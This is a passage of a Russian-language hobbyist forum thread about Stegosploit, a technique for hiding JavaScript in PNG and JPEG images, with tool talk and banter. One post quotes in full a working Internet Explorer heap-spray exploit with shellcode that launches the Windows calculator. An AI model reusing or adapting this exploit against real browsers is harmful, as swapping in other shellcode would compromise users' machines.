GIF/JPEG/HTML, или как издеваются над браузерами |
Здравствуйте, гость ( Вход | Регистрация )
GIF/JPEG/HTML, или как издеваются над браузерами |
08 Aug 2016, 20:46
Сообщение
#41
|
|
пират с чёрной меткой Сообщений: 23 646 Спасибо сказали: 12922 раза |
И это срабатывает только с png? Jpeg так можно заразить?
-------------------- Давший быка на убой не выпросил и печень на жаркое.
|
|
|
08 Aug 2016, 20:54
Сообщение
#42
|
|
laughed as one fey Сообщений: 12 166 Спасибо сказали: 20585 раз |
Лол, мне сегодня тред как раз в жилу пришелся.
На работе побырику склепал отдачу макетов писем через генерацию хтмлки с маймтайпом ворда и доковским расширением. Удивительный мир программирования, да. |
|
|
08 Aug 2016, 21:09
Сообщение
#43
|
|
Nevada-kun Сообщений: 1 978 Спасибо сказали: 842 раза |
Боишься, как бы графику не воровали? Ну вот же Оrziе переживал, что его графику кто-нибудь без спросу будет с форума брать, и Feаnоr тоже, а вот теперь я для них скрипт собрал! Теперь никто их графику не возьмёт, а если возьмёт, то стыдно будет! Вот Гехард Стейн, например. Он все кампании из T-800 mod засунул в свою сборку и даже в авторах не написал, у кого взял. А теперь он следующую кампанию так без спросу просто взять и вставить уже не сможет, так как будет появлятся надпись с правильными credits. И ему будет стыдно! Вот! Те же единороссы уже много лет народ обворовывают. Это типаж такой. И твой Стйен такой же. -------------------- |
|
|
08 Aug 2016, 21:21
(Сообщение отредактировал t800 - 08 Aug 2016, 21:43)
Сообщение
#44
|
|
Разработчик Сообщений: 534 Спасибо сказали: 221 раз |
И это срабатывает только с png? Jpeg так можно заразить? Ну вообще свой stegosploit Самуил Шах для JPG и сделал просто его скрипт для T-800 mod не подходит потому что все картинки для мода мне же надо в PNG делать, поэтому я сделал сборку на скрипте Бхарадвая Мачирая который тот написал как раз для PNG за что ему большое спасиба! -------------------- |
|
|
08 Aug 2016, 22:45
Сообщение
#45
|
|
пират с чёрной меткой Сообщений: 23 646 Спасибо сказали: 12922 раза |
t800
и какой вредоносный javascript-код может нести этот стегосплойт? Ничего более опасного, чем зацикленный alert или openwindow (и то - нормальные браузеры отловят и остановят такой сценарий) - не представляю. Ну или какой-нибудь спам рассылать. -------------------- Давший быка на убой не выпросил и печень на жаркое.
|
|
|
09 Aug 2016, 06:01
(Сообщение отредактировал t800 - 09 Aug 2016, 06:32)
Сообщение
#46
|
|
Разработчик Сообщений: 534 Спасибо сказали: 221 раз |
t800 и какой вредоносный javascript-код может нести этот стегосплойт? Ничего более опасного, чем зацикленный alert или openwindow (и то - нормальные браузеры отловят и остановят такой сценарий) - не представляю. Ну или какой-нибудь спам рассылать. Ну Самуил Шах говорит что если вcтавить в изображение вот это Код function H5(){this.d=[];this.m=new Array();this.f=new Array()}H5.prototype.flat ten=function(){for(var f=0;f<this.d.length;f++){var n=this.d[f];if(typeof(n)==' number'){var c=n.toString(16);while(c.length<8){c='0'+c}var l=function(a){retur n(parseInt(c.substr(a,2),16))};var g=l(6),h=l(4),k=l(2),m=l(0);this.f.push(g);t his.f.push(h);this.f.push(k);this.f.push(m)}if(typeof(n)=='string'){for(var d=0 ;d<n.length;d++){this.f.push(n.charCodeAt(d))}}}};H5.prototype.fill=function(a) {for(var c=0,b=0;c<a.data.length;c++,b++){if(b>=8192){b=0}a.data[c]=(b<this.f.l ength)?this.f[b]:255}};H5.prototype.spray=function(d){this.flatten();for(var b= 0;b<d;b++){var c=document.createElement('canvas');c.width=131072;c.height=1;var a=c.getContext('2d').createImageData(c.width,c.height);this.fill(a);this.m[b]= a}};H5.prototype.setData=function(a){this.d=a};var flag=false;var heap=new H5() ;try{location.href='ms-help:'}catch(e){}function spray(){var a='\xfc\xe8\x89\x0 0\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x 28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\ xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a \x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x3 1\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x 75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\ x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb \x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf 0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\x bb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00';var c=[];for(var b=0;b<1104;b+=4){c.push(1371756628)}c.push(1371756627);c.push(137 1351263);var f=[1371756626,215,2147353344,1371367674,202122408,4294967295,20212 2400,202122404,64,202116108,202121248,16384];var d=c.concat(f);d.push(a);heap.s etData(d);heap.spray(256)}function changer(){var c=new Array();for(var a=0;a<10 0;a++){c.push(document.createElement('img'))}if(flag){document.getElementById(' fm').innerHTML='';CollectGarbage();var b='\u2020\u0c0c';for(var a=4;a<110;a+=2) {b+='\u4242'}for(var a=0;a<c.length;a++){c[a].title=b}}}function run(){spray(); document.getElementById('c2').checked=true;document.getElementById('c2').onprop ertychange=changer;flag=true;document.getElementById('fm').reset()}setTimeout(r un,1000); То стегосплоит запускает калькулятор (работает под Windows 7 и в IE ) я не проверял потому, что для этого нужна Windows 7 да мне это и не надо чтобы запускался калькулятор я же хотел сделать чтобы stegosploilt выводил кредитсы. -------------------- |
|
|
09 Aug 2016, 07:32
Сообщение
#47
|
|
Зануда Сообщений: 2 236 Спасибо сказали: 2894 раза |
Цитата работает под Windows 7 и в IE А, лол, ну да, IE8 - то еще решето. Здесь его уязвимость с памятью эксплуатируется. Вот только вопрос - кого ты атаковать собрался?) Этим браузером уже никто в здравом уме не пользуется. |
|
|
09 Aug 2016, 07:48
(Сообщение отредактировал t800 - 09 Aug 2016, 08:17)
Сообщение
#48
|
|
Разработчик Сообщений: 534 Спасибо сказали: 221 раз |
Цитата работает под Windows 7 и в IE А, лол, ну да, IE8 - то еще решето. Здесь его уязвимость с памятью эксплуатируется. Вот только вопрос - кого ты атаковать собрался?) Этим браузером уже никто в здравом уме не пользуется. Атаковать? Я вобще никого не собирался атаковать. Просто я хотел сделать так чтобы PNG картинки из T-800 Mod могли выводить кредитсы. Я написал в гугле "Исполняемый PNG" нашел статью про Stegosploit, потом нашел скрипт Бхарадвая Мачирая, сделал как он пишет и все получилось. Вот! -------------------- |
|
|
09 Aug 2016, 09:30
Сообщение
#49
|
|
😸🧡✊✌️ Сообщений: 16 027 Спасибо сказали: 2672 раза |
-------------------- |
|
|
09 Aug 2016, 09:50
Сообщение
#50
|
|
laughed as one fey Сообщений: 12 166 Спасибо сказали: 20585 раз |
Цитата Здесь его уязвимость с памятью эксплуатируется. А можно гнусных подробностей (лень гуглить, да)?Цитата Этим браузером уже никто в здравом уме не пользуется. В здравом - нет, а так - добро пожаловать в не менее удивительный мир корпоративных ИС.
|
|
|
09 Aug 2016, 10:08
(Сообщение отредактировал t800 - 09 Aug 2016, 10:10)
Сообщение
#51
|
|
Разработчик Сообщений: 534 Спасибо сказали: 221 раз |
Какой то жадный он этот дядька вставил Stegosploit в Белку и требует за это денег Цитата Pretty radical, eh? Send money to: lcamtuf@coredump.cx -------------------- |
|
|
09 Aug 2016, 10:21
(Сообщение отредактировал feanor - 09 Aug 2016, 10:21)
Сообщение
#52
|
|
laughed as one fey Сообщений: 12 166 Спасибо сказали: 20585 раз |
Почему требует-то?)
Обычная просьба о донате. |
|
|
09 Aug 2016, 10:42
Сообщение
#53
|
|
😸🧡✊✌️ Сообщений: 16 027 Спасибо сказали: 2672 раза |
Он ещё и радикал!
-------------------- |
|
|
09 Aug 2016, 11:04
Сообщение
#54
|
|
Immortal Сообщений: 1 080 Спасибо сказали: 2067 раз |
И какой он радикал? Свободный? Углеводородный? Кубический?
-------------------- Будь я проклят... Татуин! Это чудесное место... Ой, спойлер (с) Фил Колсон.
|
|
|
09 Aug 2016, 18:02
(Сообщение отредактировал Эроласт - 09 Aug 2016, 18:05)
Сообщение
#55
|
|
Зануда Сообщений: 2 236 Спасибо сказали: 2894 раза |
Цитата А можно гнусных подробностей (лень гуглить, да)? Подробностей не подскажу, я в низкий уровень не умею) Когда-то слышал об этой уязвимости, как работает - хз. Ну, вот так код выглядит, если восстановить форматирование: Запись в прототип - это так в старом JS методы класса объявляли. И, похоже, это все-таки для IE9, потому что в IE8 canvas еще не было. |
|
|
09 Aug 2016, 19:16
(Сообщение отредактировал t800 - 09 Aug 2016, 19:18)
Сообщение
#56
|
|
Разработчик Сообщений: 534 Спасибо сказали: 221 раз |
Вообще это Самуил Шах очень веселый. Прямо как Шерлок Холмс.
Он взял и свой Stegosploit Toolkit v0.2 запакавал в картинку и добавил ее в PDF файл Цитата The Stegosploit Toolkit v0.2, released in Issue 0x08 of Poc||GTFO, contains the tools necessary to test image based exploit delivery. The toolkit is distributed as a PNG polyglot within the PoC||GTFO PDF, which is also a polyglot! The PNG file - stegosploit_tool.png contains all the tools. For a simple demo, you can save it to the local desktop, rename it to HTML and open it in a browser. Clicking the lioness will trigger the decoder and it will extract the toolkit from the pixels and download it. For a complex demo, this PNG has to be uploaded somewhere, and techniques such as MIME type confusion or Content Sniffing have to be used to trick the browser into believing it is an HTML file. Я закачал этот его PDF попробовал извлечь вложенные файлы PDF командой Код pdftk pocorgtfo08.pdf unpack_files Но никаких вложения не извлеклись и поэтому я стал искать другой скрипт и нашел скрипт от Бхарадвая Мачирая и на нем сделал сборку для подписи картиное. А теперь даже интересно а как извлечь из PDF этот Stegosploit Toolkit v0.2 Самуила Шаха (хотя он мне не нужен потому что у меня уже есть скрип от который все что мне надо делает, в JPG-и мне не нужны) но все равно интересно как же его надо извлекать. -------------------- |
|
|
09 Aug 2016, 19:22
Сообщение
#57
|
|
Зануда Сообщений: 2 236 Спасибо сказали: 2894 раза |
Цитата интересно а как извлечь из PDF этот Stegosploit Toolkit v0.2 Самуила Шаха Так в твоей цитате же инструкция: Цитата The PNG file - stegosploit_tool.png contains all the tools. For a simple demo, you can save it to the local desktop, rename it to HTML and open it in a browser. Clicking the lioness will trigger the decoder and it will extract the toolkit from the pixels and download it.
|
|
|
09 Aug 2016, 19:57
(Сообщение отредактировал t800 - 09 Aug 2016, 19:57)
Сообщение
#58
|
|
Разработчик Сообщений: 534 Спасибо сказали: 221 раз |
Цитата интересно а как извлечь из PDF этот Stegosploit Toolkit v0.2 Самуила Шаха Так в твоей цитате же инструкция: Цитата The PNG file - stegosploit_tool.png contains all the tools. For a simple demo, you can save it to the local desktop, rename it to HTML and open it in a browser. Clicking the lioness will trigger the decoder and it will extract the toolkit from the pixels and download it. Эту инструкию я давно перевел. Это про то как извевлечь Stegosploit Toolkit v0.2 из изображение. А вот как извлечь само изображение из PDF? И самое главное что никакой картинки с львицей в PDF нет. Я сейчас попробовал извлечь картинки камандой Код pdfimages pocorgtfo08.pdf output Она мне извлекла штук сто всяких картинок и среди них картинку толстого кота (может это и есть львица) но сколько я ее не переименовывал в HTML и не кликал на кота ничего не никуд не извлеклось Вот она эта картинка с котом. -------------------- |
|
|
09 Aug 2016, 21:01
(Сообщение отредактировал t800 - 09 Aug 2016, 22:27)
Сообщение
#59
|
|
Разработчик Сообщений: 534 Спасибо сказали: 221 раз |
Фух получилось! Оказывается этот кот вовсе не львица. А львица вот она какая должна быть.
lioness.jpg ( 216.5 килобайт ) Кол-во скачиваний: 16 А вот и сам Tool Kit какой был в картинке, только без эксплоита (его я их архива убрал потому что все равно он никому не нужен и чтобы SF не ругался) -------------------- |
|
|
09 Aug 2016, 22:09
Сообщение
#60
|
|
пират с чёрной меткой Сообщений: 23 646 Спасибо сказали: 12922 раза |
Вот она эта картинка с котом. Как ни странно, это - не кот. Это животное называется Манул, и именно эта картинка - подарок из ВКонтакте - является известным интернет-мемом.Только пришлось сохранить ее как JPG Логично, так как это jpeg.-------------------- Давший быка на убой не выпросил и печень на жаркое.
|
|
|
Текстовая версия | Сейчас: 25 April 2024 - 02:56 |
Copyright by Алексей Крючков
Programming by Degtyarev Dmitry |